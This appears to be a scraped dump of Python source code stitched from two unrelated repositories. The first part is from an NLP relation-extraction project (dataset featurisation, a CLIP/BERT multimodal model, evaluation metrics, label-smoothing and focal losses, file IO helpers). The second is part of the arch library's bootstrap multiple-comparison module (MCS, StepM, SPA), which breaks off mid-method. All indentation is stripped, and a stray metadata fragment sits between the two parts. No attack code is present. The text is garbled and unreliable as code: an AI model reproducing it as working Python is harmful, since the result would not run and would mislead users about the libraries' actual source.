dataset = TensorDataset(input_ids, attention_mask, cls_idx, labels)
elif use_bert:
dataset = TensorDataset(input_ids, attention_mask, token_type_ids, labels, so)
else:
dataset = TensorDataset(input_ids, attention_mask, labels)
return dataset
def convert_examples_to_feature_sst2(examples, max_seq_length, tokenizer, args, rel2id):
"""Loads a data file into a list of `InputBatch`s."""
save_file = "data/cached_wiki80.pkl"
mode = "text"
num_tokens = 0
num_fit_examples = 0
num_shown_examples = 0
instances = []
if False:
with open(file=save_file, mode='rb') as fr:
instances = pickle.load(fr)
print('load preprocessed data from {}.'.format(save_file))
else:
print('loading..')
for (ex_index, example) in enumerate(examples):
try:
prompt = f"[T1] [T2] {tokenizer.mask_token} ."
inputs = tokenizer(
example.text_a + prompt,
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
x = OrderedDict()
x['input_ids'] = inputs['input_ids']
x['attention_mask'] = inputs['attention_mask']
if "roberta" not in args.model_name_or_path:
x['token_type_ids'] = inputs['token_type_ids']
x['label'] = int(example.label)
instances.append(x)
except Exception as e:
print(e)
with open(file=save_file, mode='wb') as fw:
pickle.dump(instances, fw)
print('Finish save preprocessed data to {}.'.format( save_file))
input_ids = [o['input_ids'] for o in instances]
attention_mask = [o['attention_mask'] for o in instances]
if "roberta" not in args.model_name_or_path:
token_type_ids = [o['token_type_ids'] for o in instances]
token_type_ids = torch.tensor(token_type_ids)
labels = [o['label'] for o in instances]
input_ids = torch.tensor(input_ids)
attention_mask = torch.tensor(attention_mask)
labels = torch.tensor(labels)
logger.info("Average #tokens: %.2f" % (num_tokens * 1.0 / len(examples)))
logger.info("%d (%.2f %%) examples can fit max_seq_length = %d" % (num_fit_examples,
num_fit_examples * 100.0 / len(examples), max_seq_length))
if "roberta" not in args.model_name_or_path:
dataset = TensorDataset(input_ids, attention_mask, token_type_ids, labels)
else:
dataset = TensorDataset(input_ids, attention_mask, labels)
return dataset
def _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_length):
"""Truncates a sequence tuple in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b) + len(tokens_c)
if total_length <= max_length:
break
if len(tokens_a) >= len(tokens_b) and len(tokens_a) >= len(tokens_c):
tokens_a.pop()
elif len(tokens_b) >= len(tokens_a) and len(tokens_b) >= len(tokens_c):
tokens_b.pop()
else:
tokens_c.pop()
def get_dataset(mode, args, tokenizer, processor):
if mode == "train":
examples = processor.get_train_examples(args.data_dir)
elif mode == "dev":
examples = processor.get_dev_examples(args.data_dir)
elif mode == "test":
examples = processor.get_test_examples(args.data_dir)
else:
raise Exception("mode must be in choice [trian, dev, test]")
gpt_mode = "wiki80" in args.task_name
if "wiki80" in args.task_name:
# normal relation extraction task
dataset = convert_examples_to_features(
examples, args.max_seq_length, tokenizer, args, processor.get_labels()
)
return dataset
elif "sst" in args.task_name:
dataset = convert_examples_to_feature_sst2(
examples, args.max_seq_length, tokenizer, args, None
)
return dataset
else:
train_features = convert_examples_to_features_normal(
examples, args.max_seq_length, tokenizer
)
input_ids = []
input_mask = []
segment_ids = []
label_id = []
entity_id = []
for f in train_features:
input_ids.append(f.input_ids)
input_mask.append(f.input_mask)
segment_ids.append(f.segment_ids)
label_id.append(f.label_id)
all_input_ids = torch.tensor(input_ids, dtype=torch.long)
all_input_mask = torch.tensor(input_mask, dtype=torch.long)
all_segment_ids = torch.tensor(segment_ids, dtype=torch.long)
all_label_ids = torch.tensor(label_id, dtype=torch.float)
train_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
return train_data
def collate_fn(batch):
pass
processors = {"normal": bertProcessor, "reloss": relossProcessor , "ptune": ptuneProcessor, "wiki80": wiki80Processor,
"sst-2": Sst2Processor
}
```
#### File: multimodal/models/IFA_model.py
```python
import torch
from torch import nn
import torch.nn.functional as F
from .modeling_IFA import IFAModel
from .clip.modeling_clip import CLIPModel
from .clip.configuration_clip import CLIPConfig
from transformers import BertConfig, BertModel
class IFAREModel(nn.Module):
def __init__(self, num_labels, tokenizer, args):
super(IFAREModel, self).__init__()
self.args = args
self.vision_config = CLIPConfig.from_pretrained(self.args.vit_name).vision_config
self.text_config = BertConfig.from_pretrained(self.args.bert_name)
clip_model_dict = CLIPModel.from_pretrained(self.args.vit_name).vision_model.state_dict()
bert_model_dict = BertModel.from_pretrained(self.args.bert_name).state_dict()
print(self.vision_config)
print(self.text_config)
# for re
self.vision_config.device = args.device
self.model = IFAModel(self.vision_config, self.text_config)
# load:
vision_names, text_names = [], []
model_dict = self.model.state_dict()
for name in model_dict:
if 'vision' in name:
clip_name = name.replace('vision_', '').replace('model.', '')
if clip_name in clip_model_dict:
vision_names.append(clip_name)
model_dict[name] = clip_model_dict[clip_name]
elif 'text' in name:
text_name = name.replace('text_', '').replace('model.', '')
if text_name in bert_model_dict:
text_names.append(text_name)
model_dict[name] = bert_model_dict[text_name]
assert len(vision_names) == len(clip_model_dict) and len(text_names) == len(bert_model_dict), \
(len(vision_names), len(text_names), len(clip_model_dict), len(bert_model_dict))
self.model.load_state_dict(model_dict)
self.model.resize_token_embeddings(len(tokenizer))
self.dropout = nn.Dropout(0.5)
self.classifier = nn.Linear(self.text_config.hidden_size*2, num_labels)
self.head_start = tokenizer.convert_tokens_to_ids("<s>")
self.tail_start = tokenizer.convert_tokens_to_ids("<o>")
self.tokenizer = tokenizer
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
labels=None,
images=None,
aux_imgs=None,
rcnn_imgs=None,
):
bsz = input_ids.size(0)
output = self.model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
pixel_values=images,
aux_values=aux_imgs,
rcnn_values=rcnn_imgs,
return_dict=True,)
last_hidden_state, pooler_output = output.last_hidden_state, output.pooler_output
bsz, seq_len, hidden_size = last_hidden_state.shape
entity_hidden_state = torch.Tensor(bsz, 2*hidden_size) # batch, 2*hidden
for i in range(bsz):
head_idx = input_ids[i].eq(self.head_start).nonzero().item()
tail_idx = input_ids[i].eq(self.tail_start).nonzero().item()
head_hidden = last_hidden_state[i, head_idx, :].squeeze()
tail_hidden = last_hidden_state[i, tail_idx, :].squeeze()
entity_hidden_state[i] = torch.cat([head_hidden, tail_hidden], dim=-1)
entity_hidden_state = entity_hidden_state.to(self.args.device)
logits = self.classifier(entity_hidden_state)
if labels is not None:
loss_fn = nn.CrossEntropyLoss()
return loss_fn(logits, labels.view(-1)), logits
return logits
```
#### File: multimodal/modules/metrics.py
```python
def eval_result(true_labels, pred_result, rel2id, logger, use_name=False):
correct = 0
total = len(true_labels)
correct_positive = 0
pred_positive = 0
gold_positive = 0
neg = -1
for name in ['NA', 'na', 'no_relation', 'Other', 'Others', 'none', 'None']:
if name in rel2id:
if use_name:
neg = name
else:
neg = rel2id[name]
break
for i in range(total):
if use_name:
golden = true_labels[i]
else:
golden = true_labels[i]
if golden == pred_result[i]:
correct += 1
if golden != neg:
correct_positive += 1
if golden != neg:
gold_positive += 1
if pred_result[i] != neg:
pred_positive += 1
acc = float(correct) / float(total)
try:
micro_p = float(correct_positive) / float(pred_positive)
except:
micro_p = 0
try:
micro_r = float(correct_positive) / float(gold_positive)
except:
micro_r = 0
try:
micro_f1 = 2 * micro_p * micro_r / (micro_p + micro_r)
except:
micro_f1 = 0
result = {'acc': acc, 'micro_p': micro_p, 'micro_r': micro_r, 'micro_f1': micro_f1}
logger.info('Evaluation result: {}.'.format(result))
return result
```
#### File: standard/tools/loss.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class LabelSmoothSoftmaxCEV1(nn.Module):
def __init__(self, lb_smooth=0.1, reduction='mean', ignore_index=-100):
super(LabelSmoothSoftmaxCEV1, self).__init__()
self.lb_smooth = lb_smooth
self.reduction = reduction
self.lb_ignore = ignore_index
self.log_softmax = nn.LogSoftmax(dim=1)
def forward(self, logits, label):
logits = logits.float() # use fp32 to avoid nan
with torch.no_grad():
num_classes = logits.size(1)
label = label.clone().detach()
ignore = label.eq(self.lb_ignore)
n_valid = ignore.eq(0).sum()
label[ignore] = 0
lb_pos, lb_neg = 1. - self.lb_smooth, self.lb_smooth / num_classes
lb_one_hot = torch.empty_like(logits).fill_(
lb_neg).scatter_(1, label.unsqueeze(1), lb_pos).detach()
logs = self.log_softmax(logits)
loss = -torch.sum(logs * lb_one_hot, dim=1)
loss[ignore] = 0
if self.reduction == 'mean':
loss = loss.sum() / n_valid
if self.reduction == 'sum':
loss = loss.sum()
return loss
def taylor_softmax_v1(x, dim=1, n=4, use_log=False):
assert n % 2 == 0 and n > 0
fn = torch.ones_like(x)
denor = 1.
for i in range(1, n + 1):
denor *= i
fn = fn + x.pow(i) / denor
out = fn / fn.sum(dim=dim, keepdims=True)
if use_log: out = out.log()
return out
class LogTaylorSoftmaxV1(nn.Module):
def __init__(self, dim=1, n=2):
super(LogTaylorSoftmaxV1, self).__init__()
assert n % 2 == 0
self.dim = dim
self.n = n
def forward(self, x):
return taylor_softmax_v1(x, self.dim, self.n, use_log=True)
class TaylorCrossEntropyLossV1(nn.Module):
def __init__(self, n=2, ignore_index=-1, reduction='mean'):
super(TaylorCrossEntropyLossV1, self).__init__()
assert n % 2 == 0
self.taylor_softmax = LogTaylorSoftmaxV1(dim=1, n=n)
self.reduction = reduction
self.ignore_index = ignore_index
def forward(self, logits, labels):
log_probs = self.taylor_softmax(logits)
loss = F.nll_loss(log_probs, labels, reduction=self.reduction,
ignore_index=self.ignore_index)
return loss
class FocalLoss(nn.Module):
def __init__(self, gamma=0, alpha=None, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
if isinstance(alpha,(float,int)):
self.alpha = torch.Tensor([alpha,1-alpha])
if isinstance(alpha,list):
self.alpha = torch.Tensor(alpha)
self.size_average = size_average
def forward(self, input, target):
if input.dim()>2:
input = input.view(input.size(0),input.size(1),-1) # N,C,H,W => N,C,H*W
input = input.transpose(1,2) # N,C,H*W => N,H*W,C
input = input.contiguous().view(-1,input.size(2)) # N,H*W,C => N*H*W,C
target = target.view(-1,1)
logpt = F.log_softmax(input,dim=1)
logpt = logpt.gather(1,target)
logpt = logpt.view(-1)
pt = Variable(logpt.data.exp())
if self.alpha is not None:
if self.alpha.type()!=input.data.type():
self.alpha = self.alpha.type_as(input.data)
at = self.alpha.gather(0,target.data.view(-1))
logpt = logpt * Variable(at)
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average:
return loss.mean()
else:
return loss.sum()
```
#### File: standard/utils/ioUtils.py
```python
import os
import csv
import json
import pickle
import logging
from typing import NewType, List, Tuple, Dict, Any
__all__ = [
'load_pkl',
'save_pkl',
'load_csv',
'save_csv',
'load_jsonld',
'save_jsonld',
'jsonld2csv',
'csv2jsonld',
]
logger = logging.getLogger(__name__)
Path = str
def load_pkl(fp: Path, verbose: bool = True) -> Any:
"""
读取文件
Args :
fp (String) : 读取数据地址
verbose (bool) : 是否打印日志
Return :
data (Any) : 读取的数据
"""
if verbose:
logger.info(f'load data from {fp}')
with open(fp, 'rb') as f:
data = pickle.load(f)
return data
def save_pkl(data: Any, fp: Path, verbose: bool = True) -> None:
"""
保存文件
Args :
data (Any) : 数据
fp (String) :保存的地址
verbose (bool) : 是否打印日志
"""
if verbose:
logger.info(f'save data in {fp}')
with open(fp, 'wb') as f:
pickle.dump(data, f)
def load_csv(fp: Path, is_tsv: bool = False, verbose: bool = True) -> List:
"""
读取csv格式文件
Args :
fp (String) : 保存地址
is_tsv (bool) : 是否为excel-tab格式
verbose (bool) : 是否打印日志
Return :
list(reader) (List): 读取的List数据
"""
if verbose:
logger.info(f'load csv from {fp}')
dialect = 'excel-tab' if is_tsv else 'excel'
with open(fp, encoding='utf-8') as f:
reader = csv.DictReader(f, dialect=dialect)
return list(reader)
def save_csv(data: List[Dict], fp: Path, save_in_tsv: False, write_head=True, verbose=True) -> None:
"""
保存csv格式文件
Args :
data (List) : 所需保存的List数据
fp (String) : 保存地址
save_in_tsv (bool) : 是否保存为excel-tab格式
write_head (bool) : 是否写表头
verbose (bool) : 是否打印日志
"""
if verbose:
logger.info(f'save csv file in: {fp}')
with open(fp, 'w', encoding='utf-8') as f:
fieldnames = data[0].keys()
dialect = 'excel-tab' if save_in_tsv else 'excel'
writer = csv.DictWriter(f, fieldnames=fieldnames, dialect=dialect)
if write_head:
writer.writeheader()
writer.writerows(data)
def load_jsonld(fp: Path, verbose: bool = True) -> List:
"""
读取jsonld文件
Args:
fp (String): jsonld 文件地址
verbose (bool): 是否打印日志
Return:
datas (List) : 读取后的List
"""
if verbose:
logger.info(f'load jsonld from {fp}')
datas = []
with open(fp, encoding='utf-8') as f:
for l in f:
line = json.loads(l)
data = list(line.values())
datas.append(data)
return datas
def save_jsonld(fp):
"""
保存jsonld格式文件
"""
pass
def jsonld2csv(fp: str, verbose: bool = True) -> str:
"""
读入 jsonld 文件,存储在同位置同名的 csv 文件
Args:
fp (String): jsonld 文件地址
verbose (bool): 是否打印日志
Return:
fp_new (String):文件地址
"""
data = []
root, ext = os.path.splitext(fp)
fp_new = root + '.csv'
if verbose:
print(f'read jsonld file in: {fp}')
with open(fp, encoding='utf-8') as f:
for l in f:
line = json.loads(l)
data.append(line)
if verbose:
print('saving...')
with open(fp_new, 'w', encoding='utf-8') as f:
fieldnames = data[0].keys()
writer = csv.DictWriter(f, fieldnames=fieldnames, dialect='excel')
writer.writeheader()
writer.writerows(data)
if verbose:
print(f'saved csv file in: {fp_new}')
return fp_new
def csv2jsonld(fp: str, verbose: bool = True) -> str:
"""
读入 csv 文件,存储在同位置同名的 jsonld 文件
Args:
fp (String): csv 文件地址
verbose (bool): 是否打印日志
Return:
fp_new (String):文件地址
"""
data = []
root, ext = os.path.splitext(fp)
fp_new = root + '.jsonld'
if verbose:
print(f'read csv file in: {fp}')
with open(fp, encoding='utf-8') as f:
writer = csv.DictReader(f, fieldnames=None, dialect='excel')
for line in writer:
data.append(line)
if verbose:
print('saving...')
with open(fp_new, 'w', encoding='utf-8') as f:
f.write(os.linesep.join([json.dumps(l, ensure_ascii=False) for l in data]))
if verbose:
print(f'saved jsonld file in: {fp_new}')
return fp_new
``` |
{
"source": "johncollinsai/post-high-frequency-data",
"score": 3
} |
#### File: arch/bootstrap/multiple_comparison.py
```python
from __future__ import annotations
import copy
from typing import Dict, Hashable, List, Optional, Sequence, Tuple, Union, cast
import numpy as np
import pandas as pd
from arch.bootstrap.base import (
CircularBlockBootstrap,
MovingBlockBootstrap,
StationaryBootstrap,
)
from arch.typing import (
ArrayLike,
BoolArray,
Float64Array,
IntArray,
Literal,
Uint32Array,
)
from arch.utility.array import DocStringInheritor, ensure2d
__all__ = ["StepM", "SPA", "RealityCheck", "MCS"]
def _info_to_str(
model: str, info: Dict[str, str], is_repr: bool = False, is_html: bool = False
) -> str:
if is_html:
model = "<strong>" + model + "</strong>"
_str = model + "("
for k, v in info.items():
if k.lower() != "id" or is_repr:
if is_html:
k = "<strong>" + k + "</strong>"
_str += k + ": " + v + ", "
return _str[:-2] + ")"
class MultipleComparison(object):
"""
Abstract class for inheritance
"""
def __init__(self) -> None:
self._model = ""
self._info: Dict[str, str] = {}
self.bootstrap: CircularBlockBootstrap = CircularBlockBootstrap(
10, np.ones(100)
)
def __str__(self) -> str:
return _info_to_str(self._model, self._info, False)
def __repr__(self) -> str:
return _info_to_str(self._model, self._info, True)
def _repr_html_(self) -> str:
return _info_to_str(self._model, self._info, True, True)
def reset(self) -> None:
"""
Reset the bootstrap to it's initial state.
"""
self.bootstrap.reset()
def seed(self, value: Union[int, List[int], Uint32Array]) -> None:
"""
Seed the bootstrap's random number generator
Parameters
----------
value : {int, List[int], ndarray[int]}
Integer to use as the seed
"""
self.bootstrap.seed(value)
class MCS(MultipleComparison):
"""
Model Confidence Set (MCS) of Hansen, Lunde and Nason.
Parameters
----------
losses : {ndarray, DataFrame}
T by k array containing losses from a set of models
size : float, optional
Value in (0,1) to use as the test size when implementing the
mcs. Default value is 0.05.
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
method : {'max', 'R'}, optional
MCS test and elimination implementation method, either 'max' or 'R'.
Default is 'R'.
reps : int, optional
Number of bootstrap replications to uses. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
See [1]_ for details.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2011). The model confidence set.
Econometrica, 79(2), 453-497.
"""
def __init__(
self,
losses: ArrayLike,
size: float,
reps: int = 1000,
block_size: Optional[int] = None,
method: Literal["R", "max"] = "R",
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
*,
seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super().__init__()
self.losses: Float64Array = ensure2d(losses, "losses")
self._losses_arr = np.asarray(self.losses)
if self._losses_arr.shape[1] < 2:
raise ValueError("losses must have at least two columns")
self.size: float = size
self.reps: int = reps
if block_size is None:
self.block_size = int(np.sqrt(losses.shape[0]))
else:
self.block_size = block_size
self.t: int = losses.shape[0]
self.k: int = losses.shape[1]
self.method: Literal["R", "max"] = method
# Bootstrap indices since the same bootstrap should be used in the
# repeated steps
indices = np.arange(self.t)
bootstrap_meth = bootstrap.lower().replace(" ", "_")
if bootstrap_meth in ("circular", "cbb"):
bootstrap_inst = CircularBlockBootstrap(self.block_size, indices, seed=seed)
elif bootstrap_meth in ("stationary", "sb"):
bootstrap_inst = StationaryBootstrap(self.block_size, indices, seed=seed)
elif bootstrap_meth in ("moving_block", "mbb"):
bootstrap_inst = MovingBlockBootstrap(self.block_size, indices, seed=seed)
else:
raise ValueError(f"Unknown bootstrap: {bootstrap_meth}")
self._seed = seed
self.bootstrap: CircularBlockBootstrap = bootstrap_inst
self._bootstrap_indices: List[IntArray] = [] # For testing
self._model = "MCS"
self._info = dict(
[
("size", "{0:0.2f}".format(self.size)),
("bootstrap", str(bootstrap_inst)),
("ID", hex(id(self))),
]
)
self._results_computed = False
def _has_been_computed(self) -> None:
if not self._results_computed:
raise RuntimeError("Must call compute before accessing results")
def _format_pvalues(self, eliminated: Sequence[Tuple[int, float]]) -> pd.DataFrame:
columns = ["Model index", "Pvalue"]
mcs = pd.DataFrame(eliminated, columns=columns)
max_pval = mcs.iloc[0, 1]
for i in range(1, mcs.shape[0]):
max_pval = np.max([max_pval, mcs.iloc[i, 1]])
mcs.iloc[i, 1] = max_pval
model_index = mcs.pop("Model index")
if isinstance(self.losses, pd.DataFrame):
# Workaround for old pandas/numpy combination
# Preferred expression :
# model_index = pd.Series(self.losses.columns[model_index])
model_index = self.losses.iloc[:, model_index.values].columns
model_index = pd.Series(model_index)
model_index.name = "Model name"
mcs.index = model_index
return mcs
def compute(self) -> None:
"""
Compute the set of models in the confidence set.
"""
if self.method.lower() == "r":
self._compute_r()
else:
self._compute_max()
self._results_computed = True
def _compute_r(self) -> None:
"""
Computes the model confidence set using the R method
"""
# R method
# 1. Compute pairwise difference (k,k)
losses = self._losses_arr
mean_losses = losses.mean(0)[:, None]
loss_diffs = mean_losses - mean_losses.T
# Compute pairwise variance using bootstrap (k,k)
# In each bootstrap, save the average difference of each pair (b,k,k)
bootstrapped_mean_losses = np.zeros((self.reps, self.k, self.k))
bs = self.bootstrap
for j, data in enumerate(bs.bootstrap(self.reps)):
bs_index = data[0][0] # Only element in pos data
self._bootstrap_indices.append(bs_index) # For testing
mean_losses_star = losses[bs_index].mean(0)[:, None]
bootstrapped_mean_losses[j] = mean_losses_star - mean_losses_star.T
# Recenter
bootstrapped_mean_losses -= loss_diffs
variances = (bootstrapped_mean_losses ** 2).mean(0)
variances += np.eye(self.k) # Prevent division by 0
self._variances = variances
# Standardize everything
std_loss_diffs = loss_diffs / np.sqrt(variances)
std_bs_mean_losses = bootstrapped_mean_losses / np.sqrt(variances)
# 3. Using the models still in the set, compute the max (b,1)
# Initialize the set
included = np.ones(self.k, dtype=np.bool_)
# Loop until there is only 1 model left
eliminated = []
while included.sum() > 1:
indices = np.argwhere(included)
included_loss_diffs = std_loss_diffs[indices, indices.T]
test_stat = np.max(included_loss_diffs)
included_bs_losses = std_bs_mean_losses[:, indices, indices.T]
simulated_test_stat = np.max(np.max(included_bs_losses, 2), 1)
pval = (test_stat < simulated_test_stat).mean()
loc = np.argwhere(included_loss_diffs == test_stat)
# Loc has indices i,j, -- i is the elimination
# Diffs are L(i) - L(j), so large value in [i,j] indicates
# i is worse than j
# Elimination is for
i = loc.squeeze()[0]
eliminated.append((indices.flat[i], pval))
included[indices.flat[i]] = False
# Add pval of 1 for model remaining
indices = np.argwhere(included).flatten()
for ind in indices:
eliminated.append((ind, 1.0))
self._pvalues = self._format_pvalues(eliminated)
def _compute_max(self) -> None:
"""
Computes the model confidence set using the R method
"""
# max method
losses = self._losses_arr
# 1. compute loss "errors"
loss_errors = losses - losses.mean(0)
# Generate bootstrap samples
bs_avg_loss_errors = np.zeros((self.reps, self.k))
for i, data in enumerate(self.bootstrap.bootstrap(self.reps)):
bs_index = data[0][0]
self._bootstrap_indices.append(bs_index) # For testing
bs_errors = loss_errors[bs_index]
avg_bs_errors = bs_errors.mean(0)
avg_bs_errors -= avg_bs_errors.mean()
bs_avg_loss_errors[i] = avg_bs_errors
# Initialize the set
included = np.ones(self.k, dtype=np.bool_)
# Loop until there is only 1 model left
eliminated = []
while included.sum() > 1:
indices = np.argwhere(included)
incl_losses = losses[:, included]
incl_bs_avg_loss_err = bs_avg_loss_errors[:, included]
incl_bs_grand_loss = incl_bs_avg_loss_err.mean(1)
# Reshape for broadcast
incl_bs_avg_loss_err -= incl_bs_grand_loss[:, None]
std_devs = np.sqrt((incl_bs_avg_loss_err ** 2).mean(0))
simulated_test_stat = incl_bs_avg_loss_err / std_devs
simulated_test_stat = np.max(simulated_test_stat, 1)
loss_diffs = incl_losses.mean(0)
loss_diffs -= loss_diffs.mean()
std_loss_diffs = loss_diffs / std_devs
test_stat = np.max(std_loss_diffs)
pval = (test_stat < simulated_test_stat).mean()
locs = np.argwhere(std_loss_diffs == test_stat)
eliminated.append((int(indices.flat[locs.squeeze()]), pval))
included[indices.flat[locs]] = False
indices = np.argwhere(included).flatten()
for ind in indices:
eliminated.append((int(ind), 1.0))
self._pvalues = self._format_pvalues(eliminated)
@property
def included(self) -> List[Hashable]:
"""
List of model indices that are included in the MCS
Returns
-------
included : list
List of column indices or names of the included models
"""
self._has_been_computed()
included = self._pvalues.Pvalue > self.size
included = list(self._pvalues.index[included])
included.sort()
return included
@property
def excluded(self) -> List[Hashable]:
"""
List of model indices that are excluded from the MCS
Returns
-------
excluded : list
List of column indices or names of the excluded models
"""
self._has_been_computed()
excluded = self._pvalues.Pvalue <= self.size
excluded = list(self._pvalues.index[excluded])
excluded.sort()
return excluded
@property
def pvalues(self) -> pd.DataFrame:
"""
Model p-values for inclusion in the MCS
Returns
-------
pvalues : DataFrame
DataFrame where the index is the model index (column or name)
containing the smallest size where the model is in the MCS.
"""
self._has_been_computed()
return self._pvalues
class StepM(MultipleComparison):
"""
StepM multiple comparison procedure of Romano and Wolf.
Parameters
----------
benchmark : {ndarray, Series}
T element array of benchmark model *losses*
models : {ndarray, DataFrame}
T by k element array of alternative model *losses*
size : float, optional
Value in (0,1) to use as the test size when implementing the
comparison. Default value is 0.05.
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
reps : int, optional
Number of bootstrap replications to uses. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
studentize : bool, optional
Flag indicating to studentize loss differentials. Default is True
nested : bool, optional
Flag indicating to use a nested bootstrap to compute variances for
studentization. Default is False. Note that this can be slow since
the procedure requires k extra bootstraps.
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
The size controls the Family Wise Error Rate (FWER) since this is a
multiple comparison procedure. Uses SPA and the consistent selection
procedure.
See [1]_ for detail.
See Also
--------
SPA
References
----------
.. [1] <NAME>., & <NAME>. (2005). Stepwise multiple testing as
formalized data snooping. Econometrica, 73(4), 1237-1282.
"""
def __init__(
self,
benchmark: ArrayLike,
models: ArrayLike,
size: float = 0.05,
block_size: Optional[int] = None,
reps: int = 1000,
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
studentize: bool = True,
nested: bool = False,
*,
seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super(StepM, self).__init__()
self.benchmark: Float64Array = ensure2d(benchmark, "benchmark")
self.models: Float64Array = ensure2d(models, "models")
self.spa: SPA = SPA(
benchmark,
models,
block_size=block_size,
reps=reps,
bootstrap=bootstrap,
studentize=studentize,
nested=nested,
seed=seed,
)
self.block_size: int = self.spa.block_size
self.t: int = self.models.shape[0]
self.k: int = self.models.shape[1]
self.reps: int = reps
self.size: float = size
self._superior_models: Optional[List[Hashable]] = None
self.bootstrap: CircularBlockBootstrap = self.spa.bootstrap
self._model = "StepM"
if self.spa.studentize:
method = "bootstrap" if self.spa.nested else "asymptotic"
else:
method = "none"
self._info = dict(
[
("FWER (size)", "{:0.2f}".format(self.size)),
("studentization", method),
("bootstrap", str(self.spa.bootstrap)),
("ID", hex(id(self))),
]
)
def compute(self) -> None:
"""
Compute the set of superior models.
"""
# 1. Run SPA
self.spa.compute()
# 2. If any models superior, store indices, remove and re-run SPA
better_models = list(self.spa.better_models(self.size))
all_better_models = better_models[:]
# 3. Stop if nothing superior
while better_models and (len(better_models) < self.k):
# A. Use Selector to remove better models
selector = np.ones(self.k, dtype=np.bool_)
if isinstance(self.models, pd.DataFrame): # Columns
selector[self.models.columns.isin(all_better_models)] = False
else:
selector[np.array(all_better_models)] = False
self.spa.subset(selector)
# B. Rerun
self.spa.compute()
better_models = list(self.spa.better_models(self.size))
all_better_models.extend(better_models)
# Reset SPA
selector = np.ones(self.k, dtype=np.bool_)
self.spa.subset(selector)
all_better_models.sort()
self._superior_models = all_better_models
@property
def superior_models(self) -> List[Hashable]:
"""
List of the indices or column names of the superior models
Returns
-------
list
List of superior models. Contains column indices if models is an
array or contains column names if models is a DataFrame.
"""
if self._superior_models is None:
msg = "compute must be called before accessing superior_models"
raise RuntimeError(msg)
return self._superior_models
class SPA(MultipleComparison, metaclass=DocStringInheritor):
"""
Test of Superior Predictive Ability (SPA) of White and Hansen.
The SPA is also known as the Reality Check or Bootstrap Data Snooper.
Parameters
----------
benchmark : {ndarray, Series}
T element array of benchmark model *losses*
models : {ndarray, DataFrame}
T by k element array of alternative model *losses*
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
reps : int, optional
Number of bootstrap replications to uses. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
studentize : bool
Flag indicating to studentize loss differentials. Default is True
nested=False
Flag indicating to use a nested bootstrap to compute variances for
studentization. Default is False. Note that this can be slow since
the procedure requires k extra bootstraps.
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
The three p-value correspond to different re-centering decisions.
- Upper : Never recenter to all models are relevant to distribution
- Consistent : Only recenter if closer than a log(log(t)) bound
- Lower : Never recenter a model if worse than benchmark
See [1]_ and [2]_ for details.
See Also
--------
StepM
References
----------
.. [1] <NAME>. (2005). A test for superior predictive ability.
Journal of Business & Economic Statistics, 23(4), 365-380.
.. [2] <NAME>. (2000). A reality check for data snooping. Econometrica,
68(5), 1097-1126.
"""
def __init__(
self,
benchmark: ArrayLike,
models: ArrayLike,
block_size: Optional[int] = None,
reps: int = 1000,
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
studentize: bool = True,
nested: bool = False,
*,
seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super().__init__()
self.benchmark: Float64Array = ensure2d(benchmark, "benchmark")
self.models: Float64Array = ensure2d(models, "models")
self.reps: int = reps
if block_size is None:
self.block_size = int(np.sqrt(benchmark.shape[0]))
else:
self.block_size = block_size
self.studentize: bool = studentize
self.nested: bool = nested
self._loss_diff = np.asarray(self.benchmark) - np.asarray(self.models)
self._loss_diff_var = np.empty(0)
self.t: int = self._loss_diff.shape[0]
self.k: int = self._loss_diff.shape[1]
bootstrap_name = bootstrap.lower().replace(" ", "_")
if bootstrap_name in ("circular", "cbb"):
bootstrap_inst = CircularBlockBootstrap(
self.block_size, self._loss_diff, seed=seed
)
elif bootstrap_name in ("stationary", "sb"):
bootstrap_inst = StationaryBootstrap(
self.block_size, self._loss_diff, seed=seed
)
elif bootstrap_name in ("moving_block", "mbb"):
bootstrap_inst = MovingBlockBootstrap(
self.block_size, self._loss_diff, seed=seed
)
else:
